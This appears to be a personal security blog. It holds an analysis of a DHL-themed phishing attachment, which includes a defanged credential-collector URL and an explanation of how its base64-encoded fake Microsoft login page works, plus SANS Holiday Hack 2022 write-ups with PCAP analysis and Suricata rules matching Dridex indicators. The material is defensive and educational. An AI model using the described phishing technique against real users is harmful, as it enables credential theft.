Tuesday, February 28, 2023

Phishing email from "DHL"


*** DON'T TRY THIS AT HOME/WORK****

Today I got a wonderful Phisihng email, the attacker sent me a DHL bill for an account I don't have so that's the first red flag, then the attachment was an HTML instead of a PDF as stated in the email




So I decided to take a look...


I downloaded the attachment and took a pick form my WSL Linux console



Very interesting:
 
The HAKWELOTANIYDEK variable contains my email address
The Stivenkalvin variable has a base64 value that decoded becomes


 hXXp://ocbpremium.org/app/loi1hn.php so this website has been probably hacked and now host this PHP creds collector.

BTW, I try putting HAKWELOTANIYDEK in Google translate and the best match was a romanization of Arab 



When trying that URL we get redirected to office.com, probably because we don't have the right parameters to give the PHP, making people think this is a legit website.

With curl -L we can follow any redirects, HTTP code 302 indicates a redirection and the Location where are we going.




Now we have the rest of the base64 encoded JavaScript:




The atob() method decodes base64 to ASCII and document.write() populates the DOM document with the result loading all the code into the browser.

If we decode the base64 text we get HTML content with JavaScript that imitates a Microsoft login page, prepopulates the username with the value in the HAKWELOTANIYDEK, and even turns off autocomplete, no matter what you type for the password it will always return wrong password and send the information to their server.




Keeps replacing the URL on the browser with office.com with atob("aHR0cHM6Ly9vdXRsb29rLm9mZmljZS5jb20vbWFpbC8")







QUICK UPDATE, the hXXp://ocbpremium.org/ is a fake website 


The DNS is hosted by NameCheap 🚩🚩🚩🚩



Tuesday, January 10, 2023

SANS Holiday Hack Challenge 2022 - Tokein RIng

The Tolkein Ring


As we walk into the Talkain Ring area we found our old friend Sparkle Redberry, and like always, he needs our help.




We download the PCAP through the link he provides and we enter the terminal to find more instructions



First question



We open the PCAP with Wireshark and go to the menu File --> Export Objects and choose HTTP... (that's the answer, HTTP)
We immediately see the files downloaded, this also give us the answer to the next question

HTTP Objects Downloaded
Using the screenshot above we can answer question 2.



and 3



Now for question 4 we have to go a bit deeper and choose one of the HTTP streams to see that the responding HTTP headers says Server: Apache


And there we can see the IP address to answer the question



Now for question file, we can save the app.php file to our computer from the Wireshark File menu using the same Export Object option as above.

To look at the last few lines of the file we use the tail command and we can see there's a blob being saved as Ref_Sept21-2020.zip, this is the answer.





For question 6, things get a little bit more complicated, we needed to find TLS certificates exchanged in the traffic, to do that we use binwalk on the pcap


There are a lot of certificates in the file so we need to extract them to examine them

To examine the extracted files we can use find with exec to use openssl to make sure they are certs in DER format


find . -type f -exec openssl x509 -inform der -in {} -noout -text \; 2>/dev/null| grep Issuer



This gives us all the Issuers of the certificates found including the Country (C), State (ST), City/Location (L).

We can see 3 main countries:
C = IL for Israel
C = SS for South Sudan
C = US for United States

And we enter those as our answer, completing our first objective to find the Tolkein Ring.



















As we walk to the right on the same room we find Fitzy Shortstack and, of course, he has a problem to solve



We enter the terminal and find that we've been tasks with creating suricata rules to alert further communication with the Command and Control we discovered before



following the syntax we come up with arule for the first alert:

alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk"; nocase; sid:20221211;rev:1;)

always changing the sid to avoid conflicts


We check our rule and get our next task



This one is bit trickier, we need 2 rules to catch of ways of communication, or at least with the little knowledge I have on suricata this is the way I found that worked find


alert http any any -> 192.185.57.242 any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2022121122;rev:1;)
alert http 192.185.57.242 any -> any any (msg:"Investigate suspicious connections, possible Dridex infection";sid:2022121123;rev:1;)




We verify again, and get our new task to identify bad certificates in the traffic


To accomplish this, we need suricata to examine the certificate that is used in the TLS handshake by verifying the CommonName (CN) in it:

alert tls any any -> any any (msg:"Investigate bad certificates, possible Dridex infection";tls.cert_subject; content:"CN=heardbellith.Icanwepeh.nagoya";sid:202212114;rev:1;)


Once again, we verify our new rule and get one more task


We can find the malicous JavaScript by checking the body of the HTTP response to match the string we're looking for

alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; flow:to_client;http.response_body;content:"let byteCharacters = atob";sid:5;)

And that's it! 

Now we can walk to tend of the hall and find Snowrog (any similarities with a Balrog is just coincidence) 





And here's the long lost Tolkein Ring







SANS Holiday Hack Challenge 2022 - Introduction

Once again Santa has invited as to his cyber security conference, KringleCon at the North Pole, and once again... something weird is going on.

Santa has lost his 5 rings of power, he's definitely a lord of some rings 😉, at it seems that without this rings the holidays will be ruin for all those kids that get gifts from him for some reason 🤷

When you get to the North Pole you are given a cryptocurrency wallet while interacting with the teller machine, it seems all the businesses at the North Pole have been persuaded to use KringleCoin, so we're going to need it as we go and try to collect some coins along the way.

This is KringleCoin Wallet
Feel free to donate if you figure out how
:D



The first Cranberry Pi terminal we encountered is a pretty simple one, just to give us a sense of how things work, so we just do as it says and get that out of the way.






As we walk we find wholes on the floor, like those homes from that epic stories about small, big hairy foot beings. 


So we go down the cave to find a door that says Tolkein Ring, this is our first real challenge, but next to it is our new friend Grinchum.

Grinchum
😒Who took you, Precious? How did they take you? Mustn't happen again.
🙂 Oh, hello, humanses. Maybe we can offer help?
😏 Yes... Grinchum will help the humanses.
We are trying to distract them from finding the rest of you, Preciouses, with talk of hints and coinses.
🙂 Have you found the coffers yet? The ones at the end of hidden paths?
😏 There's hintses in them, and coinses, they're veeerrryy special.
🙂 Just look hard, for little, bitty, speckles or other oddities.
Don't worry, they will not look for you, Preciouses. Shhh...
🙂 Go on, humanses. Start searching!